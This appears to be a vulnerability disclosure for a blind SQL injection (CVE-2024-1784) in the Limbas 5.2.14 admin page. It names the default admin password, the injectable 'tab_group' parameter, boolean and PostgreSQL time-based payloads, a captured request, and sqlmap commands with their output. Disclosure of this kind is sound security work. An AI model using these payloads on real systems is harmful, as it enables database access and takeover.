Limbas-Blind-SQL-injection

Exploit Title:Limbas-Blind-SQL-injection

Exploit Author:Lina Li

Vendor Homepage: https://www.limbas.com/en/

Github Link: https://github.com/limbas/limbas

Version:5.2.14

Tested on:Kali Linux+ Apache 2.4.57+PHP 8.2.13(https://hub.docker.com/r/limbas/limbas)

CVE:CVE-2024-1784

Description:

After logging in(default:admin/limbas), on the "/main_admin.php?action=setup_gtab_ftype&group_bzm=&tab_group=1&atid=2" page, the parameter "tab_group" has the risk of blind SQL injection. It is recommended to take defensive measures such as input validation or parameterized query for SQL statements. Exploiting this vulnerability could enable an attacker to take control of the application, alter or access data, or leverage recent vulnerabilities present in the underlying database.(https://github.com/limbas/limbas/blob/master/src/limbas_src/main_admin.php)

Proof of Concept:

After logging in, go to this address:localhost/main_admin.php?action=setup_gtab_ftype&group_bzm=&tab_group=1&atid=2

Firstly, by injecting "1+and+1=1" after "tab_group", the response is normal.

After injecting "1+and+1=2" following "tab_group", there is a different response.

Use Burpsuit to intercept this request, copy the request and paste it into the "sqlinjection.txt" file.

GET /main_admin.php?action=setup_gtab_ftype&group_bzm=&tab_group=1&atid=2 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: LMB_SESS_ID=h2i9p2if9lq5trnkmor49qs698
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

Using sqlmap to extract data can be successful.

sqlmap -r sqlinjection.txt --batch --current-user

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: tab_group (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=setup_gtab_ftype&group_bzm=&tab_group=1 AND 5959=5959&atid=2

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: action=setup_gtab_ftype&group_bzm=&tab_group=1 AND 4788=(SELECT 4788 FROM PG_SLEEP(5))&atid=2
---
[02:26:32] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Debian
web application technology: PHP 8.2.13, Apache 2.4.57
back-end DBMS: PostgreSQL
[02:26:32] [INFO] fetching current user
[02:26:32] [INFO] resumed: limbasuser
current user: 'limbasuser'

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Limbas-Blind-SQL-injection.md

Limbas-Blind-SQL-injection.md

Limbas-Blind-SQL-injection

Exploit Title:Limbas-Blind-SQL-injection

Exploit Author:Lina Li

Vendor Homepage: https://www.limbas.com/en/

Github Link: https://github.com/limbas/limbas

Version:5.2.14

Tested on:Kali Linux+ Apache 2.4.57+PHP 8.2.13(https://hub.docker.com/r/limbas/limbas)

CVE:CVE-2024-1784

Description:

Proof of Concept:

Files

Limbas-Blind-SQL-injection.md

Latest commit

History

Limbas-Blind-SQL-injection.md

File metadata and controls

Limbas-Blind-SQL-injection

Exploit Title:Limbas-Blind-SQL-injection

Exploit Author:Lina Li

Vendor Homepage: https://www.limbas.com/en/

Github Link: https://github.com/limbas/limbas

Version:5.2.14

Tested on:Kali Linux+ Apache 2.4.57+PHP 8.2.13(https://hub.docker.com/r/limbas/limbas)

CVE:CVE-2024-1784

Description:

Proof of Concept: